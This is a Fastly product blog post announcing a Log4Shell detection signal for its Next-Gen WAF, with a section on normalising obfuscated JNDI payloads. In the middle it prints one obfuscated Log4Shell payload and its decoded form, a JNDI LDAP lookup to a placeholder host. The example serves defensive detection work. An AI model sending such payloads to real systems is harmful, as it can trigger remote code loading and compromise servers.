Log4j JNDI Attack Signal Now Available

Daniel Corbett

Staff Product Manager, Fastly

Background

In December 2021 the industry was swept by CVE-2021-44228, commonly referred to as Log4Shell. Because the Log4j library is so widely used, a wide range of software was left vulnerable. To make matters worse, because the attack affected applications that interacted with logs, even services an attacker had no direct access to could be vulnerable if one of the payloads passed through your logging pipeline.

Our Customer Security Operations Center (CSOC) and Security Research teams led a joint effort to quickly deploy a virtual patch for all of our customers. We established internal incident response teams and maintained around-the-clock monitoring to ensure our customers remained unaffected by this critical vulnerability. After a few days, we published some of our data and insights on the various Log4Shell attacks. While monitoring, we saw the payload variants morph as attackers developed evasion techniques to avoid detection by common WAF patterns.

Extending SmartParse

While all of our attack and anomaly signals leverage our SmartParse technology, we sometimes implement regex-based virtual patches when an immediate response is required, since this gets the patch out to our customers within minutes. However, given the sheer number of variants being created, we knew there was a better way to detect these attacks by leveraging the power of SmartParse.

Our engineers got to work behind the scenes and developed a method that extends SmartParse to take a complex Log4Shell payload and distill it down to its most basic form. To show you an example, let’s take one of the complex payloads from the wild:

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-}/site.local/test}

With SmartParse we are able to translate this into its most basic form:

${jndi:ldap://site.local/test}

Advanced Log4Shell detection and protection

Leveraging SmartParse provides advanced and precise detection with minimal-to-no false positives, without having to maintain and rely on an ever-expanding regex pattern.

We introduced this capability as a new attack signal (LOG4J-JNDI), which we initially launched within our Fastly Security Labs program. After putting the attack signal through several months of observation, we are officially announcing its general availability for all customers. Not only does it offer improved detection over regex-based matching, but as an attack signal it also lets you build rules at the organization (corp) level, quickly implementing a response policy across your global organization.

Next steps

If you are a customer, you can log into the Next-Gen WAF console and should begin seeing the new LOG4J-JNDI attack signal within your requests feed right away. By default, it’s enabled with threshold-based blocking, which you can adjust to your comfort level or switch to instant blocking as necessary.

If you are reading this and are either not using a WAF or are using a legacy WAF that relies on regex pattern matching to detect Log4Shell or OWASP injection attacks, we’d be happy to give you a demo of the Fastly Next-Gen WAF (powered by Signal Sciences) and show you the alternative to the cumbersome management and false positives that come with legacy WAFs. Reach out to our security experts for more information.